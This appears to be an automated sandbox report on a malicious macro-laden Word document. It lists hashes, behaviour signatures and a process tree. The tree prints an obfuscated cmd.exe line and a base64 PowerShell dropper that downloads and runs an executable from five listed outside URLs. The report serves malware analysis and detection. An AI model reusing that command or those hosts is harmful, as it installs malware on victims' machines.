Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    07/05/2024, 10:13

General

  • Target

    2049ca758fcda413346b7ce7fac3a09d_JaffaCakes118.doc

  • Size

    80KB

  • MD5

    2049ca758fcda413346b7ce7fac3a09d

  • SHA1

    6eddfb02a3f511943e5ac506bdb0144020fd93cc

  • SHA256

    abec5acf315037e25cfd87c8d0a2c381930258b22974c2aa3dfd365a90458ff3

  • SHA512

    534657ef05d404f65813587d1ee7aab32101396399d4f6fc5e02ac55d5652e59a367e3acee13b3acdc591ee4ab86ecc7d1a8e75986f776d67f6df1be838987d3

  • SSDEEP

    1536:SptJlmrJpmxlRw99NB6+a0HpTMUrCP+zN+Y:Ote2dw99fdIMN+

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://domestic21.com/HeVI4P

exe.dropper

http://laser-co2.com.pl/07G4T83

exe.dropper

http://kqs.me/1J6yWxp

exe.dropper

http://medion.ba/nzz2S

exe.dropper

http://xn--e1agmcgagdko5byd.xn--p1ai/gpTIKj

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2049ca758fcda413346b7ce7fac3a09d_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2268
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2680
      • C:\Windows\SysWOW64\CmD.exe
        CmD /v ^ ^ /r " SET ^ rXB^Q^=po^w^ers^h^e^ll^ ^-^e^ JA^BRA^Gw^A^bg^A9AG^4A^ZQ^B.^AC0Ab^w^B]A^G^oAZ^QBjA^_^Q^AI^AB^OAG^'^Ad^AAu^A/^\^A^Z^QB]^AE^,^Ab^A^B^pA^G'^AbgB0^A^2s^A^JABNA/I^AR^QA9^AC\^A^aA^B0A^_^QA^\A^A^6AC^8^A)^w^B^k^AG^8^Ab^Q^Bl^A^_,Ad^ABpAG^,^A,gA^xAC4A^[^wBvAG^0^A)wB^IA^G^'AVg^BJA2Q^A^'ABA^AGgA^d^A^B^0A^_AAO^g^AvAC^8A^b^ABh^A_^,A^ZQB^yAC^0^A[^w^BvA^2I^A)^g^Bj^AG8AbQAu^A^_^AAbA^AvA^2^AANwB^_A2QAV^AA4A2,^A^Q^A^B^oA_^Q^Ad^A^B^w^A^2o^A)w^AvA^GsA^\QBzAC^4^Ab^Q^B^l^AC8A,Q^B3^A^2[A^e^QBXA^_^g^A^\A^BAAG^g^AdA^B0A^_AAO^gAvAC8^Ab^Q^B^l^A^G^Q^Aa^QBv^AG^4^A)g^B]AG^EA)w^BuA_oA^e^g^A^y^A/,AQ^ABoA^_^QAd^ABw^A2oA)w^AvA_^g^A^bg^AtAC0A^Z^Q^AxA^G^E^A^Z^wB^t^A^G,AZ^w^BhAG^\AZ^A^Br^A^G^8^ANQ^B]A_^k^AZAAu^A^_gA^bgAt^AC0^A\AA^xAG^EA^aQ^Av^A^G\A^\A^B^'A^Ek^A^}^w^B^q^AC\^A)^g^BTA^_A^Ab^A^Bp^A_QA^3^AAn^A^EA^A^J^w^Ap^A2s^AJA^B1AEgAWQA^g^A^20A^IA^An^A2,^A,wAxAC^\^A^Ow^A^k^A_o^A^}^ABNA^20A^J^AB^lA^G^4^Adg^A^6^A^_^A^AdQB]A^Gw^Aa^Q^Bj^AC^s^A^J^wB^\AC^\A3w^AkA^_^'^A^}A^BZAC^sAJw^AuA^G'^AeABlAC\^A^O^wB^mAG^8A\^g^Bl^AG^E^A[^wBo^AC^g^A^J^ABo^A_^o^A^e^g^A^gAG^k^Abg^A^g^ACQATQ^B^}A^E'A3QB^7A_^QA^\gB$A_^sAJ^A^BRA^Gw^A^b^gA^u^AEQAbwB.AG4Ab^A^Bv^A^G^E^A^Z^A^BG^AGk^A^b^A^B^l^AC^gA^J^AB^oA^_^o^A^e^gA^s^AC^A^A^JA^B^6^A^E^g^A^TQ^ApA2^s^A'^wB0AGE^A\^gB^0AC^0A^'^AB^y^AG8A^[^wBl^A_,A\^w^Ag^AC^QA^egBIA^E^0A^OwB^]^A^_^IA^ZQ^B^h^AG^s^AO^wB^9A^G^,^A^[QB^0AG,A^a^A^B7^A_0^AfQAg^ACA^A^I^A^AgAC^A^A^I^A^A^g^ACA^AIAAg^AC^AAIA^Ag^ACA^A^I^AAg^AC^AA&& s^E^t ^ ^ ^T^p=!r^X^BQ:^]=i^!&& s^e^T ^ ^ ^ u^6=^!^T^p:^}^=^S!&s^E^T ^ ^8^P^B=^!^u^6^:^2=D!&&se^t ^ ^ ^mb=!^8^P^B^:^,^=^M^!&& s^e^T ^ ^ 3^a=!^m^b^:^3^=K^!&& SE^t ^ ^ ^w7^pR=^!3^a:^\^=c^!&&S^E^T ^ ^ ^ rYI=^!^w^7^pR^:)^=^L!& s^e^T ^fC=^!rY^I^:^$^=^5^!& S^E^T ^ ^ r^a^xI=^!^fC:^.=^3^!&& S^et ^ ^s^e=^!r^a^xI^:^_^=^H^!&s^e^T ^ ^ 3^t=^!^s^e:/^=^F^!& sET ^ ^ ^ ^L2V^4=!^3^t^:^'=U^!& s^et ^ ^ ^ ^lC^3X=^!^L2V^4^:[^=^Y^!&&c^A^L^L %^lC^3X% "
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2820
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -e JABRAGwAbgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABNAFIARQA9ACcAaAB0AHQAcAA6AC8ALwBkAG8AbQBlAHMAdABpAGMAMgAxAC4AYwBvAG0ALwBIAGUAVgBJADQAUABAAGgAdAB0AHAAOgAvAC8AbABhAHMAZQByAC0AYwBvADIALgBjAG8AbQAuAHAAbAAvADAANwBHADQAVAA4ADMAQABoAHQAdABwADoALwAvAGsAcQBzAC4AbQBlAC8AMQBKADYAeQBXAHgAcABAAGgAdAB0AHAAOgAvAC8AbQBlAGQAaQBvAG4ALgBiAGEALwBuAHoAegAyAFMAQABoAHQAdABwADoALwAvAHgAbgAtAC0AZQAxAGEAZwBtAGMAZwBhAGcAZABrAG8ANQBiAHkAZAAuAHgAbgAtAC0AcAAxAGEAaQAvAGcAcABUAEkASwBqACcALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJAB1AEgAWQAgAD0AIAAnADMAMwAxACcAOwAkAHoASABNAD0AJABlAG4AdgA6AHAAdQBiAGwAaQBjACsAJwBcACcAKwAkAHUASABZACsAJwAuAGUAeABlACcAOwBmAG8AcgBlAGEAYwBoACgAJABoAHoAegAgAGkAbgAgACQATQBSAEUAKQB7AHQAcgB5AHsAJABRAGwAbgAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABoAHoAegAsACAAJAB6AEgATQApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAegBIAE0AOwBiAHIAZQBhAGsAOwB9AGMAYQB0AGMAaAB7AH0AfQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1536

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

            Filesize

            68KB

            MD5

            29f65ba8e88c063813cc50a4ea544e93

            SHA1

            05a7040d5c127e68c25d81cc51271ffb8bef3568

            SHA256

            1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

            SHA512

            e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

            Filesize

            344B

            MD5

            3da1f1160f4c9fb41f77619d8c937a00

            SHA1

            b6724d4ecdc4377bf4855d4b9289657dad9d8184

            SHA256

            66eb325eb00532ab32e063d14076a3af308e595e7da28e4846a377760ae760f6

            SHA512

            bad7d79d1aa752deea87239fa84e5527184a4220c0d06f866b4eb4b0537b482ad370dd99fa68f57857b0e6f6178aa2d0d97672187f1313e40cb62b2cd3e13e71

          • C:\Users\Admin\AppData\Local\Temp\Cab9407.tmp

            Filesize

            65KB

            MD5

            ac05d27423a85adc1622c714f2cb6184

            SHA1

            b0fe2b1abddb97837ea0195be70ab2ff14d43198

            SHA256

            c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

            SHA512

            6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

          • C:\Users\Admin\AppData\Local\Temp\Tar94F8.tmp

            Filesize

            177KB

            MD5

            435a9ac180383f9fa094131b173a2f7b

            SHA1

            76944ea657a9db94f9a4bef38f88c46ed4166983

            SHA256

            67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

            SHA512

            1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

            Filesize

            20KB

            MD5

            4d26e2b20c5f0f605ce8cc74eeb8531a

            SHA1

            7262981af678b0f1bfcf486a7164505f158f43ed

            SHA256

            0a41e7b0348b120c0b9f0cd0811dec2e129f1ee03b865f7d3025a79302e130ff

            SHA512

            b09efb07c215476264a3eac53afea6eee92bf7b5379e551e6089172d8a4ee03b7a71f2e112b2372dff26007e92456905e78053f650c77cd2f4db8cc909d9b8a0

          • memory/2268-73-0x00000000005F0000-0x00000000006F0000-memory.dmp

            Filesize

            1024KB

          • memory/2268-13-0x00000000005F0000-0x00000000006F0000-memory.dmp

            Filesize

            1024KB

          • memory/2268-58-0x00000000005F0000-0x00000000006F0000-memory.dmp

            Filesize

            1024KB

          • memory/2268-50-0x00000000005F0000-0x00000000006F0000-memory.dmp

            Filesize

            1024KB

          • memory/2268-34-0x00000000005F0000-0x00000000006F0000-memory.dmp

            Filesize

            1024KB

          • memory/2268-28-0x00000000005F0000-0x00000000006F0000-memory.dmp

            Filesize

            1024KB

          • memory/2268-27-0x00000000005F0000-0x00000000006F0000-memory.dmp

            Filesize

            1024KB

          • memory/2268-26-0x00000000005F0000-0x00000000006F0000-memory.dmp

            Filesize

            1024KB

          • memory/2268-18-0x00000000005F0000-0x00000000006F0000-memory.dmp

            Filesize

            1024KB

          • memory/2268-17-0x00000000005F0000-0x00000000006F0000-memory.dmp

            Filesize

            1024KB

          • memory/2268-16-0x00000000005F0000-0x00000000006F0000-memory.dmp

            Filesize

            1024KB

          • memory/2268-0-0x000000002F161000-0x000000002F162000-memory.dmp

            Filesize

            4KB

          • memory/2268-57-0x00000000005F0000-0x00000000006F0000-memory.dmp

            Filesize

            1024KB

          • memory/2268-46-0x00000000005F0000-0x00000000006F0000-memory.dmp

            Filesize

            1024KB

          • memory/2268-14-0x00000000005F0000-0x00000000006F0000-memory.dmp

            Filesize

            1024KB

          • memory/2268-66-0x00000000005F0000-0x00000000006F0000-memory.dmp

            Filesize

            1024KB

          • memory/2268-12-0x00000000005F0000-0x00000000006F0000-memory.dmp

            Filesize

            1024KB

          • memory/2268-74-0x00000000005F0000-0x00000000006F0000-memory.dmp

            Filesize

            1024KB

          • memory/2268-9-0x00000000005F0000-0x00000000006F0000-memory.dmp

            Filesize

            1024KB

          • memory/2268-7-0x00000000005F0000-0x00000000006F0000-memory.dmp

            Filesize

            1024KB

          • memory/2268-6-0x00000000005F0000-0x00000000006F0000-memory.dmp

            Filesize

            1024KB

          • memory/2268-82-0x000000007124D000-0x0000000071258000-memory.dmp

            Filesize

            44KB

          • memory/2268-83-0x00000000005F0000-0x00000000006F0000-memory.dmp

            Filesize

            1024KB

          • memory/2268-19-0x00000000005F0000-0x00000000006F0000-memory.dmp

            Filesize

            1024KB

          • memory/2268-15-0x00000000005F0000-0x00000000006F0000-memory.dmp

            Filesize

            1024KB

          • memory/2268-8-0x00000000005F0000-0x00000000006F0000-memory.dmp

            Filesize

            1024KB

          • memory/2268-2-0x000000007124D000-0x0000000071258000-memory.dmp

            Filesize

            44KB

          • memory/2268-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2268-168-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2268-169-0x000000007124D000-0x0000000071258000-memory.dmp

            Filesize

            44KB